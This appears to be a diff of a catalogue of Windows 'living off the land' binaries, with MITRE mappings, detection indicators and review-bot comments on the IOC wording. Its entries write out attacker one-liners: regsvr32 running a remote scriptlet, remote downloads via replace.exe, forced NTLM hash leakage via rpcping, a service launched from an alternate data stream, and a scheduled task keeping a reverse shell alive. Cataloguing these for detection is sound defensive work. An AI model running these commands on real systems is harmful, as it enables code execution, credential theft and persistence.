||||
Description: Program Compatibility Assistant
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: pcalua.exe -a calc.exe
|
||||
Description: Open the target .EXE using the Program Compatibility Assistant.
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -41,4 +41,4 @@ Acknowledgement:
|
||||
Handle: '@kylehanslovan'
|
||||
- Person: Fab
|
||||
Handle: '@0rbz_'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pcwrun.exe
|
||||
Description: Program Compatibility Wizard
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Pcwrun.exe c:\temp\beacon.exe
|
||||
Description: Open the target .EXE file with the Program Compatibility Wizard.
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\pcwrun.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -23,4 +23,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Pktmon.exe
|
||||
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
|
||||
Author: 'Derek Johnson'
|
||||
Created: '2020-08-12'
|
||||
Created: 2020-08-12
|
||||
Commands:
|
||||
- Command: pktmon.exe start --etw
|
||||
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
|
||||
@ -23,9 +23,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\pktmon.exe
|
||||
- Path: c:\windows\syswow64\pktmon.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: .etl files found on system
|
||||
Resources:
|
||||
- Link: https://binar-x79.com/windows-10-secret-sniffer/
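Review bot: `- IOC: .etl files found on system` is too broad to act on, because ETW trace files with that extension are produced routinely by Windows itself; the command's own Description says the capture is written as PktMon.etl, so the indicator should name it, e.g. `- IOC: PktMon.etl files being created outside of an administrator's diagnostic session`, and a second IOC for `pktmon.exe start` command lines on workstations would give responders something to query on. The `Code_Sample:` and `Detection:` lines printed twice in the last hunk look like whitespace-only fixes and are not what this note is about.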
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Presentationhost.exe
|
||||
Description: File is used for executing Browser applications
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Presentationhost.exe C:\temp\Evil.xbap
|
||||
Description: Executes the target XAML Browser Application (XBAP) file
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Presentationhost.exe
|
||||
- Path: C:\Windows\SysWOW64\Presentationhost.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Print.exe
|
||||
Description: Used by Windows to send files to the printer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
|
||||
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
|
||||
@ -31,7 +31,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\print.exe
|
||||
- Path: C:\Windows\SysWOW64\print.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Print.exe getting files from internet
|
||||
@ -42,4 +42,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
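--- /dev/null
+++ b/yml/OSBinaries/PrintBrm.yml
@@ -0,0 +1,32 @@
+---
+Name: PrintBrm.exe
+Description: Printer Migration Command-Line Tool
+Author: 'Elliot Killick'
+Created: '2021-06-21'
+Commands:
+- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
+Description: Create a ZIP file from a folder in a remote drive
+Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
+Category: Download
+Privileges: User
+MitreID: T1105
+MitreLink: https://attack.mitre.org/techniques/T1105/
+OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
+Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
+Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
+Category: ADS
+Privileges: User
+MitreID: T1096
+MitreLink: https://attack.mitre.org/techniques/T1096/
+OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
+Detection:
+- IOC: PrintBrm.exe should not be run on a normal workstation
+Resources:
+- Link: https://twitter.com/elliotkillick/status/1404117015447670800
+Acknowledgement:
+- Person: Elliot Killick
+Handle: '@elliotkillick'
+---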
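Review bot: The first command's `Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file` describes data leaving the host, but the command as written pulls a remote folder into a local ZIP and is classified `Category: Download`, so the two fields point in opposite directions; `Usecase: Copy the contents of a remote UNC share into a local zip file` would match the Category and the Description. The single IOC is the same generic "should not be run on a normal workstation" line used for the other new entries; given both commands are documented here, `PrintBrm.exe invoked with -f pointing at an alternate data stream` would be a concrete second indicator grounded in the second command. `OperatingSystem: Windows Vista, ...` capitalises Vista while the existing entries in this diff write `Windows vista`; harmless, but worth normalising for anyone filtering on the string.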
@ -2,7 +2,7 @@
|
||||
Name: Psr.exe
|
||||
Description: Windows Problem Steps Recorder, used to record screen and clicks.
|
||||
Author: Leon Rodenko
|
||||
Created: '2020-06-27'
|
||||
Created: 2020-06-27
|
||||
Commands:
|
||||
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
|
||||
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
|
||||
@ -15,9 +15,9 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\psr.exe
|
||||
- Path: c:\windows\syswow64\psr.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: psr.exe spawned
|
||||
- IOC: suspicious activity when running with "/gui 0" flag
|
||||
Resources:
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Rasautou.exe
|
||||
Description: Windows Remote Access Dialer
|
||||
Author: 'Tony Lambert'
|
||||
Created: '2020-01-10'
|
||||
Created: 2020-01-10
|
||||
Commands:
|
||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||
- Command: rasautou -d powershell.dll -p powershell -a a -e e
|
||||
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
|
||||
Usecase: Execute DLL code
|
||||
Category: Execute
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rasautou.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: rasautou.exe command line containing -d and -p
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: FireEye
|
||||
Handle: '@FireEye'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Reg.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
|
||||
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\reg.exe
|
||||
- Path: C:\Windows\SysWOW64\reg.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: reg.exe writing to an ADS
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Regasm.exe
|
||||
Description: Part of .NET
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
- Command: regasm.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1121
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1121
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
Category: Execute
|
||||
@ -25,7 +25,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regasm.exe executing dll file
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regedit.exe
|
||||
Description: Used by Windows to manipulate registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
|
||||
Description: Export the target Registry key to the specified .REG file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regedit.exe
|
||||
- Path: C:\Windows\SysWOW64\regedit.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regedit.exe reading and writing to alternate data stream
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regini.exe
|
||||
Description: Used to manipulate the registry
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2020-07-03'
|
||||
Created: 2020-07-03
|
||||
Commands:
|
||||
- Command: regini.exe newfile.txt:hidden.ini
|
||||
Description: Write registry keys from data inside the Alternate data stream.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regini.exe
|
||||
- Path: C:\Windows\SysWOW64\regini.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regini.exe reading from ADS
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
Handle: '@elisalem9'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Register-cimprovider.exe
|
||||
Description: Used to register new wmi providers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||
Description: Load the target .DLL.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvcs.exe
|
||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvcs.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvr32.exe
|
||||
Description: Used by Windows to register dlls
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvr32.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regsvr32.exe getting files from Internet
|
||||
@ -51,4 +51,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
Name: Replace.exe
|
||||
Description: Used to replace file with another file
|
||||
Description: Used to replace file with another file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Description: Copy file.cab to destination
|
||||
Usecase: Copy files
|
||||
Usecase: Copy files
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||
Description: Download/Copy bar.exe to outdir
|
||||
Usecase: Download file
|
||||
Usecase: Download file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\replace.exe
|
||||
- Path: C:\Windows\SysWOW64\replace.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Replace.exe getting files from remote server
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: elceef
|
||||
Handle: '@elceef'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rpcping.exe
|
||||
Description: Used to verify rpc connection
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rpcping.exe
|
||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rundll32.exe
|
||||
Description: Used by Windows to execute dll files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
@ -65,13 +65,13 @@ Commands:
|
||||
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem: Windows 10 (and likely previous versions)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Runonce.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Runonce.exe /AlternateShellStartup
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\runonce.exe
|
||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Runscripthelper.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||
Description: Execute the PowerShell script named test.txt
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Event 4014 - Powershell logging
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
---
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Sc.exe
|
||||
Description: Used by Windows to manage services
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||
Description: Creates a new service and executes the file stored in the ADS.
|
||||
Usecase: Execute binary file hidden inside an alternate data stream
|
||||
Category: ADS
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\sc.exe
|
||||
- Path: C:\Windows\SysWOW64\sc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Schtasks.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||
Description: Create a recurring task to execute every minute.
|
||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||
Category: Execute
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1053
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
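Review bot: `- IOC: Services that gets created` under `Detection:` appears to have been copied from the Sc.exe entry, where it belongs; for Schtasks.exe the observable is the scheduled task, so the line should read something like `- IOC: Scheduled tasks being created (schtasks /create) on workstations`, which also ties the indicator to the command documented above. In the Sc.exe section the same line should at least read `Services that get created`. The twice-printed `Category: Execute` and `Code_Sample:` lines presumably differ only in trailing whitespace, which the rendered view does not show.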
|
||||
|